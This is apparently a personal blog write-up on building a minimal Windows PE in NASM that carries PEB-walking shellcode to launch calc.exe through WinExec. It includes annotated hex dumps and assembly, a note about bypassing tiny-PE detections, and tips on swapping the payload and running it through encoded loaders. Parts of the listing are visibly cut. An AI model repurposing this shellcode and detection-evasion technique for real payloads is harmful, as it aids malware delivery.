Modern PE Mangling I've been wanting to learn more about Windows exploits and shellcode techniques for a bit, but a lot of resources out there (similarly to Linux), are based on 32 bit version of Windows, are very version specific, and simply don't work on modern systems. I decided to get started by learning more about 64 bit PEs. I really don't know much about proper Windows API programming, so I wanted to see the bare minimum required to load and run code on Windows. WARNING: I am not a Windows expert, I am barely a Windows user, so please excuse my noobishness and feel free to hit me up on twitter if you have any corrections or extra info for this. ───[ Prior Work ]─────────────────────────────────────────────────────────────── Early attempts to create the smallest PE possible were based on 32 bit Windows versions. Prior to this, you could create beautifuly tiny COM files on DOS using 16 bit assembly. The first writeup I read was this one, which determined the following limits on 32 bit Windows versions. Smallest possible PE file: 97 bytes Smallest possible PE file on Windows 2000: 133 bytes Smallest PE file that downloads a file over WebDAV and executes it: 133 bytes Unfortunately, the links to the files on this page are dead, so I could only see what was listed on the page. The binary included here won't run on modern Windows versions, so if we want to create a tiny binary to run on Windows 10, we'll have to do some more research. The consensus I found was that the limit for binary size in 64 bit Windows versions was 268 bytes. Thanks to the excellent Corkami docs (PE101,PE102), I was able to explore the format a bit more in depth. I located a few POCs, and examined how the binaries that were generated were structured. - Corkami PE POCs - rcx/tinyPE The header overlay technique that was established in the first writeup seem to be employed by these POCs, but they don't overlay section headers. The section headers define the .text segment as well as others, but it appears that they aren't required for whatever reason. ───[ First Attempts ]─────────────────────────────────────────────────────────── I decided to keep the tradition of using NASM to write binaries by hand, because it's easier to keep track of each byte individually and debug. My POC was based on the rcx/TinyPE repo's smallest-pe.exe file. I created a list of all of the headers and their sizes / locations to keep track of what was already there. Click here for header list! ╭─ DOS Header ───────────────────╮ ╭─ PE Header ──────────────────────────────╮ │ # │ Sz │ Desc │ │ # │ Sz │ Desc │ ├────┼────┼──────────────────────┤ ├────┼────┼────────────────────────────────┤ │ MA │ 2 │ e_magic │ │ PA │ 4 │ PE Signature │ │ MB │ 2 │ e_cblp ** │ │ PB │ 2 │ Machine (Intel 386) │ │ MC │ 2 │ e_cp ** │ │ PC │ 2 │ NumberOfSections │ │ MD │ 2 │ e_crlc ** │ │ PD │ 4 │ TimeDateStamp ** │ │ ME │ 2 │ e_cparhdr ** │ │ PE │ 4 │ PointerToSymbolTable ** │ │ MF │ 2 │ e_minalloc ** │ │ PF │ 4 │ NumberOfSymbols ** │ │ MG │ 2 │ e_maxalloc ** │ │ PG │ 2 │ SizeOfOptionalHeader │ │ MH │ 2 │ e_ss ** │ │ PH │ 2 │ Characteristics (no relocs, │ │ MI │ 2 │ e_sp ** │ │ │ │ executable, 32 bit) │ │ MJ │ 2 │ e_csum ** │ ╰──────────────────────────────────────────╯ │ MK │ 2 │ e_ip ** │ ╭─ Optional Header ────────────────────────╮ │ ML │ 2 │ e_cs ** │ │ # │ Sz │ Desc │ │ MM │ 2 │ e_lsarlc ** │ ├────┼────┼────────────────────────────────┤ │ MN │ 2 │ e_ovno ** │ │ OA │ 2 │ Magic (PE32) │ │ MO │ 8 │ e_res ** │ │ OB │ 1 │ MajorLinkerVersion ** │ │ MP │ 2 │ e_oemid ** │ │ OC │ 1 │ MinorLinkerVersion ** │ │ MQ │ 2 │ e_oeminfo ** │ │ OD │ 4 │ SizeOfCode ** │ │ MR │ 20 │ e_res2 ** │ │ OE │ 4 │ SizeOfInitializedData ** │ │ MS │ 4 │ e_lfanew PE Sig Addr │ │ OF │ 4 │ SizeOfUninitializedData ** │ ╰────────────────────────────────╯ │ OG │ 4 │ AddressOfEntryPoint │ │ OH │ 4 │ BaseOfCode ** │ Anything marked with a * means │ OI │ 4 │ BaseOfData ** │ that it is unused. Some of these │ OJ │ 4 │ ImageBase │ might have some expected value │ OK │ 4 │ SectionAlignment │ ranges to respect, so keep that │ OL │ 4 │ FileAlignment │ in mind when playing with them! │ OM │ 2 │ MajorOperatingSystemVersion ** │ │ ON │ 2 │ MinorOperatingSystemVersion ** │ │ OO │ 2 │ MajorImageVersion ** │ │ OP │ 2 │ MinorImageVersion ** │ │ OQ │ 2 │ MajorSubsystemVersion │ │ OR │ 2 │ MinorSubsystemVersion ** │ │ OS │ 4 │ Win32VersionValue ** │ │ OT │ 4 │ SizeOfImage │ │ OU │ 4 │ SizeOfHeaders │ │ OV │ 4 │ CheckSum ** * │ │ OW │ 2 │ Subsystem (Win32 GUI) │ │ OX │ 2 │ DllCharacteristics ** │ │ OY │ 4 │ SizeOfStackReserve ** │ │ OZ │ 4 │ SizeOfStackCommit │ │ O1 │ 4 │ SizeOfHeapReserve │ │ O2 │ 4 │ SizeOfHeapCommit ** │ │ O3 │ 4 │ LoaderFlags ** │ │ O4 │ 4 │ NumberOfRvaAndSizes ** │ ╰──────────────────────────────────────────╯ After I got it working, I needed a payload. I remembered the wonderful writeup by Iliya Dafchev, "Writing Windows Shellcode", which details a more modern approach to Windows shellcode. It uses the technique of parsing the PEB structure to find the base address of kernel32.dll, and then calling WinExec using arguments on the stack and execute calc.exe. As much as I love shellstorm, many of the payloads listed for Windows are based on much older versions. Some of them use hardcoded addresses which aren't as portable, so I figured it'd be a lot nicer to take an existing payload and pack it into the binary. The first step was loading payload into the binary and seeing if it worked as is. Fortunately, it did! I was able to just put the payload after the headers at 0x7C and execute. Here is what that binary looks like. $ xxd tiny304.exe MC-- MD-- ME-- MF-- MG-- MH-- MA-- MB-- PA------- PB-- PC-- PD------- 00000000: 4d5a 0000 5045 0000 4c01 0000 0000 0000 MZ..PE..L....... MI-- MJ-- MK-- ML-- MM-- MN-- MO------- PE------- PF------- PG-- PH-- OA-- OBOC 00000010: 0000 0000 0000 0000 6000 0301 0b01 0000 ........`....... MO------- MP-- MQ-- MR----------------- OD------- OE------- OF------- OG------- 00000020: 0300 0000 0000 0000 0000 0000 7c00 0000 ............|... MR--------------------------- MS------- OH------- OI------- OJ------- OK------- 00000030: 0000 0000 0000 0000 0000 4000 0400 0000 ..........@..... OL------- OM-- ON-- OO-- OP-- OQ-- OR-- 00000040: 0400 0000 0000 0000 0000 0000 0500 0000 ................ OS------- OT------- OU------- OV------- 00000050: 0000 0000 8000 0000 7c00 0000 0000 0000 ........|....... OW-- OX-- OY------- OZ------- O1------- 00000060: 0200 0004 0000 1000 0010 0000 0000 1000 ................ O2------- O3------- O4------- CK------- 00000070: 0010 0000 0000 0000 0000 0000 31f6 83ec ............1... 00000080: 1856 6a63 6668 7865 6857 696e 4589 65fc .VjcfhxehWinE.e. 00000090: 648b 5e30 8b5b 0c8b 5b14 8b1b 8b1b 8b5b d.^0.[..[......[ 000000a0: 1089 5df8 8b43 3c01 d88b 4078 01d8 8b48 ..]..C 000000b0: 2401 d989 4df4 8b78 2001 df89 7df0 8b50 $...M..x ...}..P 000000c0: 1c01 da89 55ec 8b58 1431 c08b 55f8 8b7d ....U..X.1..U..} 000000d0: f08b 75fc 31c9 fc8b 3c87 01d7 6683 c108 ..u.1... 000000e0: f3a6 740a 4039 d872 e583 c426 eb41 8b4d ..t.@9.r...&.A.M 000000f0: f489 d38b 55ec 668b 0441 8b04 8201 d831 ....U.f..A.....1 00000100: d252 682e 6578 6568 6361 6c63 686d 3332 .Rh.exehcalchm32 00000110: 5c68 7973 7465 6877 735c 5368 696e 646f \hystehws\Shindo 00000120: 6843 3a5c 5789 e66a 0a56 ffd0 83c4 46c3 hC:\W..j.V....F. Being shellcode, the payload has some extra instructions to preserve and restore registers, which help to clean up the execution if it was to be injected. We can safely take out those instructions and continue. I did some other small optimizations to reduce the code size, but other than that it's a pretty tight payload. ───[ (Ab)using the Headers ]──────────────────────────────────────────────────── I had looked through some of the previous documentation on aspects of the header that aren't used. The headers are already overlayed, but within the overlay, there are still some portions of the headers that are unused. These areas can be used to store data or execute code without interfering with the binary's execution. The areas that I used are listed on the side here -> ╭ Range ───── Len ─╮ │ 0x0C:0x18 │ 12 │ When you jump around a header like this, you'll have │ 0x1E:0x2C │ 14 │ to remember a couple of things. First, for each cave │ 0x44:0x4C │ 8 │ in the header, unless you are ending the code there, │ 0x4E:0x54 │ 6 │ you must make sure you have enough room for your jumps │ 0x5C:0x60 │ 4 │ to other areas. │ 0x70:0x78 │ 8 │ ╰──────────────────╯ I tend to allocate 2 bytes, because short jumps are generally the easiest to work with, but you can use whatever you like as long as you keep the space they take up in mind! The other thing is, if you are jumping past the bounds of 127 bytes forward or 128 bytes back with a short jump, the size of the instruction increases. Something else I noticed was that NumberOfRvaAndSizes is touchy, and it possibly prevents the binary from loading if you put something there. This and other header areas are certainly open for experimentation! Another trick of mine for ELF binary mangling was to put the code entrypoint in the header itself. This is not as straightforward with 64 bit PEs. Windows 8 established a restriction that the AddressOfEntryPoint can't be smaller than SizeOfHeaders. The way around this is to set SizeOfHeaders to AddressOfEntryPoint. More info here. I didn't end up doing this trick, because the size of the binary was already very small, and I wanted to fill up each part of it until the very end. ───[ Final Binary ]───────────────────────────────────────────────────────────── So, armed with all of this information, this is the binary I ended up with. BITS 32 ;--- Smallest possible Win10 binary that execs calc.exe --------------------\\-- ; ; Compile: ; nasm -f bin -o tiny268_64.exe tiny268_64.asm ; Notice: You might get an error like "Cannot be started 0xc000000005", ; this is fine, just run it again. ; Versions: ; Bypass TinyPE detections Date: 20200330 ; Size: 268 bytes (SHA1) c935b155c6cdeacc495d7b695e71f0229e9ce5fc ; First version at 268 bytes Date: 20200329 ; Size: 268 bytes (SHA1) 60e2c89d391052cc00145d277883e7feb6b67dd0 ; Original Version without optimization Date: 20200328 ; Size: 304 bytes (SHA1) bb59448a94acee171ea574e3a50dd6a2b75f4965 ; ; Breakdown of Sections - Listed in comments of the header 0x00:0x7C ; ; MC-- MD-- ME-- MF-- MG-- MH-- ; MA-- MB-- PA------- PB-- PC-- PD------- ; 00000000: 4d5a 0001 5045 0000 4c01 0000 31f6 83ec MZ..PE..L...1... ; MI-- MJ-- MK-- ML-- MM-- MN-- MO------- ; PE------- PF------- PG-- PH-- OA-- OBOC ; 00000010: 1856 6a63 9090 eb06 6000 0301 0b01 6668 .Vjc....`.....fh ; MO------- MP-- MQ-- MR----------------- ; OD------- OE------- OF------- OG------- ; 00000020: 7865 6857 696e 4589 65fc eb22 7c00 0000 xehWinE.e.."|... ; MR--------------------------- MS------- ; OH------- OI------- OJ------- OK------- ; 00000030: 0000 0000 0000 0000 0000 4000 0400 0000 ..........@..... ; OL------- OM-- ON-- OO-- OP-- OQ-- OR-- ; 00000040: 0400 0000 8b5b 0c8b 5b14 eb10 0500 648b .....[..[.....d. ; OS------- OT------- OU------- OV------- ; 00000050: 5e30 ebf0 8000 0000 7c00 0000 8b1b eb10 ^0......|....... ; OW-- OX-- OY------- OZ------- O1------- ; 00000060: 0200 0004 0000 1000 0010 0000 0000 1000 ................ ; O2------- O3------- O4------- CK------- ; 00000070: 8b1b 8b5b 10eb 07c3 0000 0000 eb8e 895d ...[...........] ; 00000080: f88b 433c 01d8 8b40 7801 d88b 4824 01d9 ..C 0x0C PEB_LDR_DATA ; --> 0x14 InMemoryOrderModuleList ; --> 0x00 ntdll.dll entry address ; --> 0x00 kernel32.dll list entry address ; --> 0x10 kernel32.dll base address !! ; Note that most of this is done in the header, see jump2 - jump5 ; PEB Parser Part 5 ------------------------------------------------------------ mov [ebp-0x8], ebx ; 895df8 ; kernel32.dll base address ;--- Finding WinExec address ; This section weaves it's way through the headers of kernel32.dll. ; Based on a non-fucky PE like this one, we can sort of rely on certain things ; being where we expect them. ; First, the Relative Virtual address of the PE signature is loaded from ebx. ; EAX then becomes the address that we're calculating from. ; ; The addresses of our structures are calculated using the base address of the ; PE signature in EAX + it's offset within that structure, and then added to the ; base address stored in EBX. These are then moved to the stack. ; mov eax,dword [ebx+0x3c] ; 8b433c ; RVA of PE signature add eax,ebx ; 01d8 ; PE sig addr = base addr + RVA of PE sig mov eax,dword [eax+0x78] ; 8b4078 ; RVA of Export Table add eax,ebx ; 01d8 ; Address of Export Table mov ecx,dword [eax+0x24] ; 8b4824 ; RVA of Ordinal Table add ecx,ebx ; 01d9 ; Address of Ordinal Table mov dword [ebp-0xc],ecx ; 894df4 ; Put on the stack mov edi,dword [eax+0x20] ; 8b7820 ; RVA of Name Pointer Table add edi,ebx ; 01df ; Address of Name Pointer Table mov dword [ebp-0x10],edi ; 897df0 ; Put on the stack mov edx,dword [eax+0x1c] ; 8b501c ; RVA of Address Table add edx,ebx ; 01da ; Address of Address Table mov dword [ebp-0x14],edx ; 8955ec ; Put on the stack mov ebx,dword [eax+0x14] ; 8b5814 ; Number of exported functions ;--- Using the Name Pointer Table ; This part loops through the Name Pointer Table and compares entries to what ; we're looking for: "WinExec". ; The number of entries is counted using EAX, and once the WinExec entry is ; found, the entry in the ordinal table is found using the count. See 'locate' xor eax,eax ; 31c0 ; EAX will be our entry counter mov edx, dword [ebp - 8] ; 8b55f8 ; EDX = kernel32.dll base address loopy: mov edi,dword [ebp-0x10] ; 8b7df0 ; edi = Address of Name Pointer Table mov esi,dword [ebp-4] ; 8b75fc ; esi = "WinExec\x00" xor ecx,ecx ; 31c9 ; ECX = 0 cld ; fc ; Clear direction flag ; Strings now go left->right mov edi,dword [edi+eax*4] ; 8b3c87 ; Name Pointer Table entries are 4 bytes, ; edi (NPT addr) + eax (num entries) * 4 add edi,edx ; 01d7 ; EDI = NPT addr + kernel32.ddl base addr add cx,0x8 ; 6683c108 ; Length of "WinExec" repe cmpsb ; f3a6 ; Compare the first 8 bytes in esi and edi jz locate ; 740a ; Jump if there's a match. inc eax ; 40 ; Increment entry counter cmp eax,ebx ; 39d8 ; Check if the last function was reached jb loopy ; 72e5 ; If not the last one, continue add esp,0x26 ; 83c426 ; Move stack away from our mess jmp endy ; eb41 ; If nothing found, return ;--- Executing our function ; Once we're here, we know the position of WinExec within the ordinal table ; of kernel32.dll, so now all that's left is to call the function. ; We use all of our saved addresses on the stack for this. locate: mov ecx, [ebp-0xc] ; 8b4df4 ; ECX = Address of Ordinal Table mov ebx, edx ; 89d3 ; EBX = kernel32.dll base address mov edx, [ebp-0x14] ; 8b55ec ; EDX = Address of Address Table mov ax, [ecx+eax*2] ; 668b0441; AX = ordinal addr + (ordinal num * 2) mov eax, [edx+eax*4] ; 8b0482 ; EAX = Addr table addr + (ordinal * 4) add eax,ebx ; 01d8 ; EAX = WinExec Addr = ; = kernel32.dll base address + RVA of WinExec xor edx,edx ; 31d2 ; We need a 0... push edx ; 52 ; ...for the end of our string push 0x6578652e ; 682e657865 ; push 0x636c6163 ; 6863616c63 ; push 0x5c32336d ; 686d33325c ; push 0x65747379 ; 6879737465 ; push 0x535c7377 ; 6877735c53 ; push 0x6f646e69 ; 68696e646f ; push 0x575c3a43 ; 68433a5c57 ; mov esi,esp ; 89e6 ; ESI="C:\Windows\System32\calc.exe" push 0xa ; 6a0a ; window state SW_SHOWDEFAULT push esi ; 56 ; "C:\Windows\System32\calc.exe" call eax ; ffd0 ; WinExec add esp,0x46 ; 83c446 ; Clear the stack The binary starts with a short jump back into the headers, and then leaps around to set up WinExec on the stack and begin to parse the PEB, before jumping back to the main code section and continuing execution there. If WinExec isn't found, it returns back into the headers to execute the final ret instruction. The payload ends kind of abruptly. You could simply just not include the last instruction after 'call eax', but I didn't have anything else to put there so I just left it to keep the size. ───[ What do I use this for? ]────────────────────────────────────────────────── You can modify the last portion of code in the 'locate' label to push whatever program you want to execute, in this case "C:\Windows\System32\calc.exe", onto the stack, and execute something else. You'll have to make sure you allocate enough stack space for yourself and place arguments in the right place if they are required. You can use powershell or some lolbins or whatever elite FUD 100% battle tested "plz don't upload to VT or ur ded!!" binary loader to execute a base64 encoded version of this binary. Check out my other small binaries on Github! Download the POC binary here. Payload generator for WinExec method ───[ Shoutouts ]──────────────────────────────────────────────────────────────── Thanks to dnz, readme, xehle, secfarmer, remy, Ange Albertini, Iliya Dafchev, and everyone in the Binary Analysis and Exploit Dev chans I dump crap into.